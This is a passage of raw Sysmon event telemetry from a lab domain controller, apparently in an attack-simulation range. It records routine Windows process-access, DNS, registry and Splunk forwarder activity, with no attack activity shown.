ws\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 
10341000x80000000000000004902Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:41:59.051{59A5CD1D-8E46-6005-0C00-00000000A301}5961112C:\Windows\system32\svchost.exe{59A5CD1D-8E46-6005-1600-00000000A301}1544C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8b22|c:\windows\system32\lsm.dll+8a76|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004901Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:41:59.051{59A5CD1D-8E46-6005-0C00-00000000A301}596632C:\Windows\system32\svchost.exe{59A5CD1D-8E46-6005-1600-00000000A301}1544C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8b22|c:\windows\system32\lsm.dll+8a76|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004900Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:41:59.051{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-8E46-6005-1600-00000000A301}1544C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8a38|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004899Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:41:59.051{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E46-6005-1600-00000000A301}1544C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8a38|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004898Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:41:59.051{59A5CD1D-8E46-6005-0C00-00000000A301}596632C:\Windows\system32\svchost.exe{59A5CD1D-8E46-6005-1600-00000000A301}1544C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8a38|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004897Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:41:59.051{59A5CD1D-8E46-6005-0C00-00000000A301}5961112C:\Windows\system32\svchost.exe{59A5CD1D-8E46-6005-1600-00000000A301}1544C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8a38|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 11241100x80000000000000004991Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.localDLL2021-01-18 13:42:00.020{59A5CD1D-9027-6005-1201-00000000A301}4836C:\Windows\System32\sihclient.exeC:\Windows\SoftwareDistribution\SIH\stage\eng\siheng.dll2021-01-18 13:42:00.004 22542200x80000000000000004993Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:41:59.910{59A5CD1D-9027-6005-1201-00000000A301}4836download.windowsupdate.com0type: 5 wu-fg-shim.trafficmanager.net;type: 5 2-01-3cf7-0009.cdx.cedexis.net;type: 5 fg.download.windowsupdate.com.c.footprint.net;::ffff:8.253.95.120;::ffff:67.27.158.254;::ffff:67.27.159.126;::ffff:67.27.234.126;::ffff:8.248.131.254;C:\Windows\System32\SIHClient.exe 22542200x80000000000000004992Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:41:59.250{59A5CD1D-9027-6005-1201-00000000A301}4836sls.update.microsoft.com0type: 5 sls.update.microsoft.com.akadns.net;type: 5 sls.emea.update.microsoft.com.akadns.net;::ffff:52.152.110.14;C:\Windows\System32\SIHClient.exe 
22542200x80000000000000004995Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:42:01.539{59A5CD1D-8E56-6005-2E00-00000000A301}2464120.95.253.8.in-addr.arpa.9003-C:\Windows\sysmon64.exe 22542200x80000000000000004994Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:42:00.465{59A5CD1D-8E56-6005-2E00-00000000A301}246414.110.152.52.in-addr.arpa.9003-C:\Windows\sysmon64.exe 13241300x80000000000000004996Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-SetValue2021-01-18 13:42:14.645{59A5CD1D-8E46-6005-1100-00000000A301}1172C:\Windows\system32\svchost.exeHKLM\System\CurrentControlSet\Services\W32Time\Config\LastKnownGoodTimeQWORD (0x01d6ed9f-0xbaf8ba33) 10341000x80000000000000004998Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:42:17.520{59A5CD1D-8E46-6005-0D00-00000000A301}6284704C:\Windows\system32\svchost.exe{59A5CD1D-8E46-6005-1600-00000000A301}1544C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+ca3e|c:\windows\system32\rpcss.dll+b157|c:\windows\system32\rpcss.dll+7897|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004997Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:42:17.520{59A5CD1D-8E46-6005-0D00-00000000A301}6284704C:\Windows\system32\svchost.exe{59A5CD1D-8E46-6005-1200-00000000A301}1212C:\Windows\System32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+ca3e|c:\windows\system32\rpcss.dll+b157|c:\windows\system32\rpcss.dll+7897|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004999Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:42:19.848{59A5CD1D-8E46-6005-0D00-00000000A301}6284704C:\Windows\system32\svchost.exe{59A5CD1D-8E46-6005-1600-00000000A301}1544C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+ca3e|c:\windows\system32\rpcss.dll+b157|c:\windows\system32\rpcss.dll+7897|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005012Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:42:44.691{59A5CD1D-8EE3-6005-B500-00000000A301}28363856C:\Windows\system32\conhost.exe{59A5CD1D-9054-6005-1501-00000000A301}4892C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005011Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:42:44.691{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 
10341000x80000000000000005010Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:42:44.691{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005009Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:42:44.691{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005008Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:42:44.691{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005007Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:42:44.691{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005006Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:42:44.691{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005005Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:42:44.691{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005004Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:42:44.691{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005003Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:42:44.691{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005002Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:42:44.691{59A5CD1D-8E44-6005-0500-00000000A301}6401180C:\Windows\system32\csrss.exe{59A5CD1D-9054-6005-1501-00000000A301}4892C:\Program 
Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000005001Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:42:44.691{59A5CD1D-8EE3-6005-B100-00000000A301}41243752C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{59A5CD1D-9054-6005-1501-00000000A301}4892C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x80000000000000005000Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:42:44.692{59A5CD1D-9054-6005-1501-00000000A301}4892C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe10.0.10011.16384SplunkMonNoHandle Control ProgramWindows (R) Win 7 DDK driverWindows (R) Win 7 DDK providerSplunkMonNoHandle.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe"C:\Windows\system32\NT 
AUTHORITY\SYSTEM{59A5CD1D-8E44-6005-E703-000000000000}0x3e70SystemMD5=BF28C74E12839E40CD89696C7CB01573,SHA256=6187325F302F232DE582FE28E0E0D2B292AB8122C3356C9CE295A482D7B93EA3,IMPHASH=27776F2813155A6CF34F6A075A0C2EC8{59A5CD1D-8EE3-6005-B100-00000000A301}4124C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 10341000x80000000000000005026Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:42:45.519{59A5CD1D-9055-6005-1601-00000000A301}4380804C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe{59A5CD1D-8EE3-6005-B100-00000000A301}4124C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+6025c5|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+6020f6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+59e67|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+5b88c|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+8e7d70|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005025Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:42:45.379{59A5CD1D-8EE3-6005-B500-00000000A301}28363856C:\Windows\system32\conhost.exe{59A5CD1D-9055-6005-1601-00000000A301}4380C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005024Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:42:45.379{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005023Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 